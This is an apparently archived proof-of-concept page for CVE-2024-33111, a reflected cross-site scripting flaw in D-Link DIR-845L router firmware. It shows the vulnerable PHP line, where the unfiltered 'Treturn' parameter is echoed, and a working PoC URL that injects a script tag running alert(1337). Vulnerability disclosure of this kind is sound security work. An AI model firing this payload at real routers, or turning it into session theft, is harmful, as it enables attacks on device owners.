CVE-2024-33111 PoC — D-Link DIR-845 安全漏洞

Source

https://github.com/FaLLenSKiLL1/CVE-2024-33111

Associated Vulnerability

Title:D-Link DIR-845 安全漏洞 (CVE-2024-33111)
Description:D-Link DIR-845是中国友讯（D-Link）公司的一款无线路由器。 D-Link DIR-845L v1.01KRb03 版本及之前版本存在安全漏洞，该漏洞源于 /htdocs/webinc/js/bsc_sms_inbox.php 文件存在跨站脚本漏洞。

Description

D-Link DIR-845L router is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.

Readme

# CVE-2024-33111
D-Link DIR-845L routers version 1.01KRb03 and below are vulnerable to Cross Site Scripting (XSS) via `/htdocs/webinc/js/bsc_sms_inbox.php`.

## Vulnerable Component

- `/htdocs/webinc/js/bsc_sms_inbox.php`

## Technical Details

The vulnerability is due to the lack of filtering in the parameter `$_GET["Treturn"]` which is directly used in code on line 17 of `bsc_sms_inbox.php`.

The vulnerable code snippet:
```php
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';
```

# PoC

```
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
```

![image](https://github.com/FaLLenSKiLL1/CVE-2024-33111/assets/43922662/a2df5388-67b6-4c3c-9f97-424d7b55878d)

File Snapshot


 [4.0K]  /data/pocs/eee721097ce0001e5515a903aa09c42465716425
└── [ 749]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!